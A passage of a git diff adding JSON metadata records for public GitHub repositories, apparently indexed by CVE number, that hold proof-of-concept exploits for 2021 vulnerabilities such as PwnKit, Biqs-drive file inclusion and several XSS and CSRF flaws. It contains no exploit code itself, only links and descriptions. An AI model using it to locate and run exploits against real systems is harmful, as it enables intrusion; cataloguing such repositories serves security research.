"2022-06-23T15:04:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39433.json b/2021/CVE-2021-39433.json new file mode 100644 index 0000000000..54f7bf9083 --- /dev/null +++ b/2021/CVE-2021-39433.json @@ -0,0 +1,64 @@ +[ + { + "id": 413549812, + "name": "CVE-2021-39433", + "full_name": "PinkDraconian\/CVE-2021-39433", + "owner": { + "login": "PinkDraconian", + "id": 44903767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44903767?v=4", + "html_url": "https:\/\/github.com\/PinkDraconian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PinkDraconian\/CVE-2021-39433", + "description": "BIQS IT Biqs-drive v1.83", + "fork": false, + "created_at": "2021-10-04T19:02:35Z", + "updated_at": "2022-12-10T12:13:04Z", + "pushed_at": "2021-10-04T19:02:53Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875359853, + "name": "CVE-2021-39433", + "full_name": "ibnurusdianto\/CVE-2021-39433", + "owner": { + "login": "ibnurusdianto", + "id": 43640284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43640284?v=4", + "html_url": "https:\/\/github.com\/ibnurusdianto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ibnurusdianto\/CVE-2021-39433", + "description": "Kerentanan ini merupakan jenis Local File Inclusion (LFI) yang terdapat pada versi BIQS IT Biqs-drive v1.83 dan di bawahnya. Kerentanan ini dapat dieksploitasi dengan mengirimkan payload tertentu sebagai parameter file ke download\/index.php", + "fork": false, + "created_at": "2024-10-19T19:04:27Z", + "updated_at": "2024-10-20T03:19:51Z", + "pushed_at": "2024-10-20T03:19:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39473.json b/2021/CVE-2021-39473.json new file mode 100644 index 0000000000..86e16f6d4e --- /dev/null +++ b/2021/CVE-2021-39473.json @@ -0,0 +1,33 @@ +[ + { + "id": 686165722, + "name": "CVE-2021-39473", + "full_name": "BrunoTeixeira1996\/CVE-2021-39473", + "owner": { + "login": "BrunoTeixeira1996", + "id": 12052283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12052283?v=4", + "html_url": "https:\/\/github.com\/BrunoTeixeira1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrunoTeixeira1996\/CVE-2021-39473", + "description": null, + "fork": false, + "created_at": "2023-09-01T23:16:05Z", + "updated_at": "2023-09-01T23:16:06Z", + "pushed_at": "2023-09-01T23:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39475.json b/2021/CVE-2021-39475.json new file mode 100644 index 0000000000..a67fcfbb79 --- /dev/null +++ b/2021/CVE-2021-39475.json @@ -0,0 +1,33 @@ +[ + { + "id": 398032665, + "name": "CVE-2021-39475", + "full_name": "W4RCL0UD\/CVE-2021-39475", + "owner": { + "login": "W4RCL0UD", + "id": 85202889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85202889?v=4", + "html_url": "https:\/\/github.com\/W4RCL0UD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W4RCL0UD\/CVE-2021-39475", + "description": "Found multiple XSS vulnerabilities within PhoenixCart 1.0.8.0", + "fork": false, + "created_at": "2021-08-19T18:03:40Z", + "updated_at": "2024-10-17T03:33:19Z", + "pushed_at": "2023-10-05T15:39:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39476.json b/2021/CVE-2021-39476.json new file mode 100644 index 0000000000..c93dd222d7 --- /dev/null +++ b/2021/CVE-2021-39476.json @@ -0,0 +1,33 @@ +[ + { + "id": 399906116, + "name": "CVE-2021-39476", + "full_name": "W4RCL0UD\/CVE-2021-39476", + "owner": { + "login": "W4RCL0UD", + "id": 85202889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85202889?v=4", + "html_url": "https:\/\/github.com\/W4RCL0UD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W4RCL0UD\/CVE-2021-39476", + "description": null, + "fork": false, + "created_at": "2021-08-25T17:37:54Z", + "updated_at": "2021-08-25T17:39:15Z", + "pushed_at": "2021-08-25T17:39:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39512.json b/2021/CVE-2021-39512.json new file mode 100644 index 0000000000..86a7c11852 --- /dev/null +++ b/2021/CVE-2021-39512.json @@ -0,0 +1,33 @@ +[ + { + "id": 398434624, + "name": "CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver", + "full_name": "guusec\/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver", + "owner": { + "login": "guusec", + "id": 78179391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78179391?v=4", + "html_url": "https:\/\/github.com\/guusec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guusec\/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver", + "description": "Unauthenticated CSRF Account TakeOver in BigTreeCMS v4.4.14", + "fork": false, + "created_at": "2021-08-21T00:58:38Z", + "updated_at": "2024-09-30T20:27:29Z", + "pushed_at": "2021-08-21T02:53:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39670.json b/2021/CVE-2021-39670.json new file mode 100644 index 0000000000..a8e58040b9 --- /dev/null +++ b/2021/CVE-2021-39670.json @@ -0,0 +1,39 @@ +[ + { + "id": 605438103, + "name": "Wallbreak", + "full_name": "Supersonic\/Wallbreak", + "owner": { + "login": "Supersonic", + "id": 36431699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36431699?v=4", + "html_url": "https:\/\/github.com\/Supersonic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Supersonic\/Wallbreak", + "description": "Exploit app for CVE-2021-39670 and CVE-2021-39690, two permanent denial-of-service vulnerabilities in Android's wallpaper system", + "fork": false, + "created_at": "2023-02-23T06:36:47Z", + "updated_at": "2023-05-22T10:56:43Z", + "pushed_at": "2023-03-03T17:39:43Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve", + "exploit", + "security", + "vrp" + ], + "visibility": "public", + "forks": 0, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39685.json b/2021/CVE-2021-39685.json new file mode 100644 index 0000000000..548fd364bc --- /dev/null +++ b/2021/CVE-2021-39685.json @@ -0,0 +1,33 @@ +[ + { + "id": 438658753, + "name": "inspector-gadget", + "full_name": "szymonh\/inspector-gadget", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/inspector-gadget", + "description": "CVE-2021-39685 Description and sample exploit for Linux USB Gadget overflow vulnerability", + "fork": false, + "created_at": "2021-12-15T14:28:00Z", + "updated_at": "2024-11-16T10:28:23Z", + "pushed_at": "2022-04-28T10:15:24Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39692.json b/2021/CVE-2021-39692.json new file mode 100644 index 0000000000..fae3f614ec --- /dev/null +++ b/2021/CVE-2021-39692.json @@ -0,0 +1,33 @@ +[ + { + "id": 485788776, + "name": "packages_apps_ManagedProvisioning_CVE-2021-39692", + "full_name": "nanopathi\/packages_apps_ManagedProvisioning_CVE-2021-39692", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/packages_apps_ManagedProvisioning_CVE-2021-39692", + "description": null, + "fork": false, + "created_at": "2022-04-26T13:03:35Z", + "updated_at": "2022-04-26T13:06:56Z", + "pushed_at": "2023-04-17T12:24:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39696.json b/2021/CVE-2021-39696.json new file mode 100644 index 0000000000..88133ca23c --- /dev/null +++ b/2021/CVE-2021-39696.json @@ -0,0 +1,33 @@ +[ + { + "id": 585432482, + "name": "frameworks_base_AOSP_10_r33_CVE-2021-39696", + "full_name": "nidhihcl\/frameworks_base_AOSP_10_r33_CVE-2021-39696", + "owner": { + "login": "nidhihcl", + "id": 121002296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121002296?v=4", + "html_url": "https:\/\/github.com\/nidhihcl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl\/frameworks_base_AOSP_10_r33_CVE-2021-39696", + "description": null, + "fork": false, + "created_at": "2023-01-05T06:42:33Z", + "updated_at": "2023-03-27T01:17:17Z", + "pushed_at": "2023-01-05T06:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39704.json b/2021/CVE-2021-39704.json new file mode 100644 index 0000000000..b3de6ea524 --- /dev/null +++ b/2021/CVE-2021-39704.json @@ -0,0 +1,33 @@ +[ + { + "id": 485748968, + "name": "framework_base_AOSP10_r33_CVE-2021-39704", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-39704", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-39704", + "description": null, + "fork": false, + "created_at": "2022-04-26T11:04:14Z", + "updated_at": "2022-04-26T11:21:43Z", + "pushed_at": "2022-04-26T11:23:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39706.json b/2021/CVE-2021-39706.json new file mode 100644 index 0000000000..b1d2d35ce2 --- /dev/null +++ b/2021/CVE-2021-39706.json @@ -0,0 +1,33 @@ +[ + { + "id": 486566485, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-39706", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-39706", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-39706", + "description": null, + "fork": false, + "created_at": "2022-04-28T11:30:43Z", + "updated_at": "2023-03-27T01:13:07Z", + "pushed_at": "2022-04-28T12:12:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3972.json b/2021/CVE-2021-3972.json new file mode 100644 index 0000000000..d7a3722b17 --- /dev/null +++ b/2021/CVE-2021-3972.json @@ -0,0 +1,33 @@ +[ + { + "id": 484005758, + "name": "CVE-2021-3972", + "full_name": "killvxk\/CVE-2021-3972", + "owner": { + "login": "killvxk", + "id": 309424, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/309424?v=4", + "html_url": "https:\/\/github.com\/killvxk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killvxk\/CVE-2021-3972", + "description": "just poc", + "fork": false, + "created_at": "2022-04-21T10:25:32Z", + "updated_at": "2022-05-13T08:58:40Z", + "pushed_at": "2022-04-21T11:02:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39749.json b/2021/CVE-2021-39749.json new file mode 100644 index 0000000000..a8db5fbeb7 --- /dev/null +++ b/2021/CVE-2021-39749.json @@ -0,0 +1,33 @@ +[ + { + "id": 482306637, + "name": "OrganizerTransaction", + "full_name": "michalbednarski\/OrganizerTransaction", + "owner": { + "login": "michalbednarski", + "id": 1826899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4", + "html_url": "https:\/\/github.com\/michalbednarski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michalbednarski\/OrganizerTransaction", + "description": "PoC for CVE-2021-39749, allowing starting arbitrary Activity on Android 12L Beta", + "fork": false, + "created_at": "2022-04-16T16:36:48Z", + "updated_at": "2024-11-26T07:42:25Z", + "pushed_at": "2022-04-16T16:37:23Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-39863.json b/2021/CVE-2021-39863.json new file mode 100644 index 0000000000..9fb13b55ef --- /dev/null +++ b/2021/CVE-2021-39863.json @@ -0,0 +1,64 @@ +[ + { + "id": 437552816, + "name": "CVE-2021-39863", + "full_name": "lsw29475\/CVE-2021-39863", + "owner": { + "login": "lsw29475", + "id": 13043359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4", + "html_url": "https:\/\/github.com\/lsw29475", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsw29475\/CVE-2021-39863", + "description": null, + "fork": false, + "created_at": "2021-12-12T13:27:16Z", + "updated_at": "2023-12-25T22:12:25Z", + "pushed_at": "2022-01-06T09:37:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 842031281, + "name": "CVE-2021-39863", + "full_name": "WHS-SEGFAULT\/CVE-2021-39863", + "owner": { + "login": "WHS-SEGFAULT", + "id": 178087340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178087340?v=4", + "html_url": "https:\/\/github.com\/WHS-SEGFAULT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WHS-SEGFAULT\/CVE-2021-39863", + "description": null, + "fork": false, + "created_at": "2024-08-13T14:29:40Z", + "updated_at": "2024-11-03T15:56:49Z", + "pushed_at": "2024-11-03T15:56:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40101.json b/2021/CVE-2021-40101.json new file mode 100644 index 0000000000..483cc506e8 --- /dev/null +++ b/2021/CVE-2021-40101.json @@ -0,0 +1,38 @@ +[ + { + "id": 418598904, + "name": "CVE-2021-40101", + "full_name": "S1lkys\/CVE-2021-40101", + "owner": { + "login": "S1lkys", + "id": 40408435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40408435?v=4", + "html_url": "https:\/\/github.com\/S1lkys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S1lkys\/CVE-2021-40101", + "description": "Survey XSS combined with CSRF leads to Admin Account Takeover in Concrete5 8.5.4", + "fork": false, + "created_at": "2021-10-18T17:18:28Z", + "updated_at": "2024-06-21T00:09:35Z", + "pushed_at": "2021-10-18T17:50:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "concrete5", + "cve-2021-40101", + "exploit", + "xss" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40113.json b/2021/CVE-2021-40113.json new file mode 100644 index 0000000000..ee05ff5772 --- /dev/null +++ b/2021/CVE-2021-40113.json @@ -0,0 +1,33 @@ +[ + { + "id": 595069959, + "name": "CVE-2021-40113", + "full_name": "karamMahmad\/CVE-2021-40113", + "owner": { + "login": "karamMahmad", + "id": 123936314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123936314?v=4", + "html_url": "https:\/\/github.com\/karamMahmad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karamMahmad\/CVE-2021-40113", + "description": "Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: Log in with a default credential if the Telnet protocol is enabled Perform c CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-30T10:30:36Z", + "updated_at": "2023-02-20T13:44:13Z", + "pushed_at": "2022-12-28T23:25:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40154.json b/2021/CVE-2021-40154.json new file mode 100644 index 0000000000..13dfe8d8ce --- /dev/null +++ b/2021/CVE-2021-40154.json @@ -0,0 +1,33 @@ +[ + { + "id": 431310135, + "name": "CVE-2021-40154", + "full_name": "Jeromeyoung\/CVE-2021-40154", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-40154", + "description": "POC to test the BootROM vulnerability found in LPC55S69 and K82 Series ", + "fork": false, + "created_at": "2021-11-24T01:34:47Z", + "updated_at": "2024-07-05T17:03:44Z", + "pushed_at": "2023-02-18T19:00:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40222.json b/2021/CVE-2021-40222.json new file mode 100644 index 0000000000..0a39d4549b --- /dev/null +++ b/2021/CVE-2021-40222.json @@ -0,0 +1,33 @@ +[ + { + "id": 392752058, + "name": "CVE-2021-40222", + "full_name": "asang17\/CVE-2021-40222", + "owner": { + "login": "asang17", + "id": 88450083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88450083?v=4", + "html_url": "https:\/\/github.com\/asang17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asang17\/CVE-2021-40222", + "description": "Remote Code Execution at Rittal", + "fork": false, + "created_at": "2021-08-04T16:10:05Z", + "updated_at": "2021-09-13T12:16:01Z", + "pushed_at": "2021-09-13T12:15:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40223.json b/2021/CVE-2021-40223.json new file mode 100644 index 0000000000..b67b1d7c67 --- /dev/null +++ b/2021/CVE-2021-40223.json @@ -0,0 +1,33 @@ +[ + { + "id": 392751851, + "name": "CVE-2021-40223", + "full_name": "asang17\/CVE-2021-40223", + "owner": { + "login": "asang17", + "id": 88450083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88450083?v=4", + "html_url": "https:\/\/github.com\/asang17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asang17\/CVE-2021-40223", + "description": "XSS Vulnerability in Rittal", + "fork": false, + "created_at": "2021-08-04T16:09:24Z", + "updated_at": "2021-09-13T12:15:32Z", + "pushed_at": "2021-09-13T12:15:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-403.json b/2021/CVE-2021-403.json new file mode 100644 index 0000000000..26d853a95b --- /dev/null +++ b/2021/CVE-2021-403.json @@ -0,0 +1,33 @@ +[ + { + "id": 488150478, + "name": "CVE-2021-403", + "full_name": "rhysmcneill\/CVE-2021-403", + "owner": { + "login": "rhysmcneill", + "id": 33672728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33672728?v=4", + "html_url": "https:\/\/github.com\/rhysmcneill", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhysmcneill\/CVE-2021-403", + "description": null, + "fork": false, + "created_at": "2022-05-03T09:36:40Z", + "updated_at": "2022-11-17T06:24:21Z", + "pushed_at": "2022-05-03T09:50:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40303.json b/2021/CVE-2021-40303.json new file mode 100644 index 0000000000..a6a3481cd9 --- /dev/null +++ b/2021/CVE-2021-40303.json @@ -0,0 +1,33 @@ +[ + { + "id": 570289426, + "name": "CVE-2021-40303", + "full_name": "zecopro\/CVE-2021-40303", + "owner": { + "login": "zecopro", + "id": 23106986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23106986?v=4", + "html_url": "https:\/\/github.com\/zecopro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zecopro\/CVE-2021-40303", + "description": "perfex crm 1.10 is vulnerable to Stored Cross Site Scripting (XSS) via \/clients\/profile.", + "fork": false, + "created_at": "2022-11-24T20:00:16Z", + "updated_at": "2024-01-19T19:38:46Z", + "pushed_at": "2022-11-24T20:02:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4034.json b/2021/CVE-2021-4034.json new file mode 100644 index 0000000000..343f858b10 --- /dev/null +++ b/2021/CVE-2021-4034.json @@ -0,0 +1,5185 @@ +[ + { + "id": 452072547, + "name": "CVE-2021-4034", + "full_name": "ryaagard\/CVE-2021-4034", + "owner": { + "login": "ryaagard", + "id": 46634151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46634151?v=4", + "html_url": "https:\/\/github.com\/ryaagard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ryaagard\/CVE-2021-4034", + "description": "Local Privilege Escalation in polkit's pkexec", + "fork": false, + "created_at": "2022-01-25T23:11:30Z", + "updated_at": "2024-10-07T14:28:36Z", + "pushed_at": "2022-01-26T01:01:15Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-4034", + "exploit" + ], + "visibility": "public", + "forks": 36, + "watchers": 72, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452081015, + "name": "CVE-2021-4034", + "full_name": "berdav\/CVE-2021-4034", + "owner": { + "login": "berdav", + "id": 1332095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1332095?v=4", + "html_url": "https:\/\/github.com\/berdav", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/berdav\/CVE-2021-4034", + "description": "CVE-2021-4034 1day", + "fork": false, + "created_at": "2022-01-25T23:51:37Z", + "updated_at": "2024-11-27T09:10:35Z", + "pushed_at": "2022-06-08T04:00:28Z", + "stargazers_count": 1968, + "watchers_count": 1968, + "has_discussions": false, + "forks_count": 512, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 512, + "watchers": 1968, + "score": 0, + "subscribers_count": 20 + }, + { + "id": 452088979, + "name": "CVE-2021-4034", + "full_name": "clubby789\/CVE-2021-4034", + "owner": { + "login": "clubby789", + "id": 13556931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13556931?v=4", + "html_url": "https:\/\/github.com\/clubby789", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clubby789\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T00:28:52Z", + "updated_at": "2023-01-10T03:23:25Z", + "pushed_at": "2022-01-26T01:26:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452094004, + "name": "CVE-2021-4034", + "full_name": "gbrsh\/CVE-2021-4034", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T00:53:19Z", + "updated_at": "2022-03-16T09:24:39Z", + "pushed_at": "2022-01-26T00:57:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452094681, + "name": "CVE-2021-4034", + "full_name": "arthepsy\/CVE-2021-4034", + "owner": { + "login": "arthepsy", + "id": 7356025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7356025?v=4", + "html_url": "https:\/\/github.com\/arthepsy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arthepsy\/CVE-2021-4034", + "description": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)", + "fork": false, + "created_at": "2022-01-26T00:56:36Z", + "updated_at": "2024-11-25T04:47:22Z", + "pushed_at": "2023-05-04T19:24:39Z", + "stargazers_count": 1059, + "watchers_count": 1059, + "has_discussions": false, + "forks_count": 305, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-4034", + "poc" + ], + "visibility": "public", + "forks": 305, + "watchers": 1059, + "score": 